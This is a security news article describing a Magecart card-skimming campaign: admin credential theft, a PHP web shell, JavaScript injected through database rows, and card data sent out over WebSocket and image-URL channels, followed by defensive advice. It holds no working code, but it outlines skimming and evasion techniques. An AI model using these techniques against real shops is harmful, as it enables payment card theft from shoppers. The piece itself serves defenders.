Magecart Targets Shoppers with New JavaScript-Based Credit Card Theft Attack

A new variant of the notorious Magecart web skimming attacks has been detected targeting e-commerce platforms, leveraging highly obfuscated JavaScript to invisibly harvest shoppers’ credit card details at checkout.

The attack, analyzed by an incident response team, demonstrates advanced techniques for site compromise, code persistence, and data exfiltration, highlighting growing risks for online retailers and their customers.

Analysis of Attack Lifecycle

The breach typically begins with the theft of backend credentials, often acquired through infostealer malware deployed on administrators’ devices.

These credentials grant attackers privileged access to a website’s management interface.

Once inside, adversaries upload a customized PHP web shell, affording persistent command-and-control (C2) over the server.

This shell is modeled on the open-source P.A.S. Fork v1.4, enabling granular interaction with the web server’s file system and databases.

Persistence is further achieved through “database pollution”: attackers manipulate database rows to inject hidden JavaScript payloads.

Whenever the compromised database entries are accessed, this malicious script executes, facilitating ongoing access and dynamic control over the website.

The malicious JavaScript embedded via database pollution employs advanced obfuscation techniques.

Variables and functions are systematically renamed using hexadecimal notation, and the code’s logic flow is rendered opaque through Immediately Invoked Function Expressions (IIFEs) and recursive function redefinitions.

This deliberate complexity exemplified by a function dubbed “chameleon” frustrates conventional code analysis and signature-based detection tools.

The script exploits browser capabilities such as localStorage and dynamically loads further payloads or modifies site content depending on real-time execution context.

According to the Report, this adaptive behavior ensures the skimmer remains effective and stealthy, even as the website evolves.

Dual-Channel Exfiltration: WebSocket and Image Objects

A notable innovation in this campaign is the use of both WebSocket and image-based channels for real-time exfiltration of sensitive data.

When a user enters payment details, the script aggregates information (including card number, CVV, expiration, address, and email) into a JavaScript object.

For WebSocket exfiltration, the script establishes an encrypted “wss://” connection to the attacker’s C2 server, whose URL is itself stored obfuscated in localStorage.

Data is serialized and transmitted using protocol messages that mimic legitimate application behavior.

For secondary exfiltration, the “createImage” function generates a new image object, crafting its src attribute to encode the stolen data (base64-encoded) as URL parameters.

This technique leverages browsers’ tendency to load images passively, thus subverting HTTP monitoring systems.

The destination URL, similarly obfuscated and stored in the browser’s localStorage, points to attacker infrastructure and includes page context, further aiding in evasion.

The complexity and sophistication of this Magecart variant make it a significant threat for e-commerce operators.

Incident response experts urge robust defense-in-depth measures, including enforcing strong, unique administrator credentials, mandatory two-factor authentication, and regular patch management.

Periodic audits of web code and backend databases are critical to detecting unauthorized modifications.

Augmenting traditional defenses with extended detection and response (XDR) technologies and properly configured web application firewalls (WAFs) can further reduce exposure.

Proactive vulnerability assessment and penetration testing are also recommended to uncover and remediate systemic weaknesses before they can be exploited.

With attackers increasingly adopting advanced, adaptive code to bypass detection, e-commerce businesses must stay vigilant to defend both their reputations and their customers’ financial safety.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates